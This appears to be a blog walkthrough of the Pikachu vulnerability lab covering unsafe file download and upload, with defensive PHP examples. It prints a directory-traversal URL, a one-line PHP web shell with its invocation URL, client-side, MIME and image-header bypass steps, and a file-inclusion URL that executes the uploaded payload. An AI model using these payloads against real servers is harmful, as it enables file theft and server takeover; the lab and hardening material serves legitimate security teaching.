Pikachu vulnerability practice platform experiments: unsafe file download and unsafe file upload (part 7)

1. Unsafe file download

1.1 Overview

Many web systems offer a file download function. When a user clicks a download link, the browser sends a request to the back end that usually carries the name of the file to download; the back end's download code then locates the file by that name and returns it in the response so the browser can save it. If the back end takes the file name from the request and appends it to its download path without checking it for safety, the result is an unsafe file download vulnerability.
An attacker can then submit, instead of the file name the program expects, a carefully constructed path (such as ../../../etc/passwd) and will very likely get that file downloaded directly, exposing sensitive back-end information (password files, source code and so on). So when a download function takes its file name from the front end, that file name must be treated with security in mind.

Remember: all data that comes from the front end is untrusted and must not be taken lightly!

1.2 Experiment

The page passes a file name to the back end; the back end looks the file up and returns it in the response to the front end.

When testing for a file download vulnerability, we can use directory traversal:

http://192.168.171.133/pikachu/vul/unsafedownload/execdownload.php?filename=../../../../../../../../../../1.txt

This lets us download the file we want; in particular, many configuration files on Linux live in fixed directories.

1.3 Precautions

  • Strictly filter the incoming file name
  • Strictly restrict the directory from which files may be downloaded
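Both precautions in one place, as an added example that is not Pikachu's own code: the requested name is accepted only as a bare file name, and the resolved path is checked to still lie inside the download directory. The directory name and the `filename` parameter handling are assumptions, not taken from execdownload.php.

```php
<?php
// Added example, not Pikachu's own code: resolve a user-supplied file name
// so that only files directly inside $downloadDir can ever be served.
function resolveDownloadPath(string $downloadDir, string $requested): ?string
{
    // Accept a bare file name only: no path separators, no ".", no "..",
    // no NUL bytes. This alone rejects ../../../etc/passwd style input.
    if ($requested === '' || $requested === '.' || $requested === '..'
        || strpos($requested, "\0") !== false
        || basename($requested) !== $requested) {
        return null;
    }
    $base = realpath($downloadDir);
    $full = realpath($downloadDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $full === false || !is_file($full)) {
        return null;
    }
    // Defence in depth: the resolved path must still sit under $base.
    // realpath() follows symlinks, so a link pointing outside is caught here.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

// How a fixed execdownload.php might use it (the directory name is assumed):
$path = resolveDownloadPath(__DIR__ . '/download', $_GET['filename'] ?? '');
if ($path === null) {
    http_response_code(400);
    exit('invalid file name');
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . (string) filesize($path));
readfile($path);
```

A stricter variant maps an opaque id (e.g. a database key) to the stored file so the client never supplies a file name at all.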

 

2. Unsafe file upload

2.1 Overview

Because of business requirements, many web sites have a file upload interface, for example:

  • Uploading an avatar picture at registration (jpg, png, gif, etc.)
  • Uploading attachments (doc, xls, etc.)

If the back end does not take security into account when handling uploaded files, or the measures it uses are flawed, an attacker can bypass them by some means and upload a malicious file (e.g. a one-line PHP web shell).

By then accessing the malicious file on the server, the attacker can gain control of the whole web server.

2.2 Test process

  • Upload a normal file as the upload function requires and look at the returned result (path, messages, etc.)
  • Try uploading different kinds of "malicious" file, such as xx.php, and analyze the response
  • Inspect the HTML source to see whether the restriction is done by JavaScript on the front end, which can be bypassed
  • Try different bypass methods: blacklist/whitelist bypass, MIME type bypass, directory 0x00 truncation bypass, etc.
  • Or combine with other vulnerabilities (such as sensitive information disclosure) to infer the path of the uploaded shell and test the connection

2.3 Client-side check

We start with the client-side check experiment; this page only allows us to upload pictures.

When we choose a PHP file, it tells us directly that the file does not meet the requirements. The PHP file we are trying to upload is:

<?php echo shell_exec($_GET['cmd']);?>

Let us check whether this restriction is implemented on the front end.

We can see that when the state of the input element changes (its onchange handler fires), it calls checkFileExt(); the source of this function is shown below.

The function checks whether the file's suffix is one of jpg, png or gif and only then lets the upload proceed.

But front-end restrictions only play a supporting role and can be bypassed, for example by deleting the contents of the onchange attribute.

After that the upload succeeds.

Then use the uploaded file:

http://192.168.171.133/pikachu/vul/unsafeupload/uploads/hack.php?cmd=ipconfig

 

2.4 Server-side check

MIME

MIME (Multipurpose Internet Mail Extensions) is a way of associating a file extension type with an application: when a file with that extension is accessed, the browser automatically opens it with the specified application. It is also used by clients to specify custom file names and to open some media files.

Each MIME type consists of two parts: the first is the broad class of data, such as audio for sound or image for pictures; the second defines the specific type. Common MIME types include:

  • HTML: .html, .htm text/html
  • Plain text files: .txt text/plain
  • RTF files: .rtf application/rtf
  • GIF images: .gif image/gif
  • JPEG images: .jpeg, .jpg image/jpeg

The $_FILES array

PHP fills in the type from the Content-Type that the browser sent in the HTTP request, and that Content-Type is under the control of the front-end user.

Using PHP's global array $_FILES, you can upload files from the client computer to the remote server.

The first index is the form input name; the second can be "name", "type", "size", "tmp_name" or "error", like this:

  • $_FILES['file']['name']: the name of the uploaded file
  • $_FILES['file']['type']: the type of the uploaded file
  • $_FILES['file']['size']: the size of the uploaded file in bytes
  • $_FILES['file']['tmp_name']: the name of the temporary copy of the file stored on the server
  • $_FILES['file']['error']: the error code resulting from the file upload

Experiment

When we upload a PHP file we get an error; next we modify the request header with Burp Suite.

Change the Content-Type to image/png (or another image type; any of them works).

This time the file uploads successfully.

 

2.5 getimagesize() type validation

getimagesize() returns the image dimensions and the image type. If this function is used to obtain the type and decide whether the file is a picture, there are problems.

It reads the first few bytes of the target file (shown as a hex string) and checks whether they match the signature of an image format; files of a given image format all begin with the same few bytes.

But the picture header can be forged, so this check can be bypassed.

We can view the first line of the picture's bytes with xxd:

xxd image.png | head -n 1

We can try to upload a picture that contains malicious code; it can be produced as follows:

  • Method 1: forge the GIF89a header directly from the Windows CMD command line: copy /b test.png + muma.php cccc.png
  • Method 2: use GIMP (open-source image editing software) and add a comment containing the code to execute:
<?php phpinfo(); ?>

Then upload this file ccc.png.

But when we visit this image, the malicious code is not executed. We can combine it with a local file inclusion vulnerability for further exploitation, guessing the location where the picture was uploaded:

http://192.168.171.133/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2019/10/09/6470185d9d609075689635710502.png&submit=Submit+Query

2.6 Precautions

  • Do not implement the upload restriction only in front-end JavaScript
  • Restrict uploaded files on the server side:
    • Check several conditions in combination: for example file size, path, extension, file type, file integrity
    • Rename uploaded files when storing them on the server (establish a sensible naming convention)
    • Control access to the upload directory on the server (e.g. read-only) and restrict execute permission to limit the damage
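Putting sections 2.4 to 2.6 together, as an added example that is not Pikachu's own code: the server ignores $_FILES['type'], sniffs the real type from the bytes on disk, treats getimagesize() as only one of several checks, re-encodes the image so that a forged header or a GIMP comment carrying PHP code does not survive, and stores the result under a server-chosen name. The form field name, size limit and storage directory are assumptions.

```php
<?php
// Added example, not Pikachu's own code: server-side validation for an
// image upload field. Assumes $storeDir is writable, not directly served by
// the web server, and has no execute permission.
function validateAndStoreImage(array $file, string $storeDir): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return [false, 'upload failed'];
    }
    if ($file['size'] > 2 * 1024 * 1024) {          // assumed 2 MiB limit
        return [false, 'file too large'];
    }
    // 1. Extension allowlist on the client-supplied name; necessary but not
    //    sufficient, since the name is attacker-controlled.
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                'png' => 'image/png',  'gif' => 'image/gif'];
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return [false, 'extension not allowed'];
    }
    // 2. Sniff the real type from the bytes on disk. $_FILES['type'] is just
    //    the Content-Type the client chose to send and is ignored entirely.
    $realMime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($realMime !== $allowed[$ext]) {
        return [false, "content is $realMime, expected {$allowed[$ext]}"];
    }
    // 3. getimagesize() confirms a parseable image header, but a forged
    //    header (copy /b, GIMP comment) passes it, so it is not the last check.
    if (@getimagesize($file['tmp_name']) === false) {
        return [false, 'not a valid image'];
    }
    // 4. Decode and re-encode with GD: only pixel data survives, so PHP code
    //    appended after the image or stored in a comment chunk is discarded.
    $img = @imagecreatefromstring(file_get_contents($file['tmp_name']));
    if ($img === false) {
        return [false, 'image could not be decoded'];
    }
    // 5. Server-chosen random name with a fixed extension; the client's file
    //    name never touches the filesystem.
    $ext  = $ext === 'jpeg' ? 'jpg' : $ext;
    $dest = rtrim($storeDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    $ok = $ext === 'png' ? imagepng($img, $dest)
        : ($ext === 'gif' ? imagegif($img, $dest) : imagejpeg($img, $dest, 90));
    return $ok ? [true, basename($dest)] : [false, 'could not store image'];
}

// Usage (assumed form field name "uploadfile" and assumed private directory):
// [$ok, $msg] = validateAndStoreImage($_FILES['uploadfile'], '/var/www/uploads_private');
```

Serving the stored file back through a script that sets the Content-Type from the allowlist, rather than linking to the upload directory directly, keeps the web server from ever interpreting an upload as PHP.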

 


Source: www.cnblogs.com/dogecheng/p/11640389.html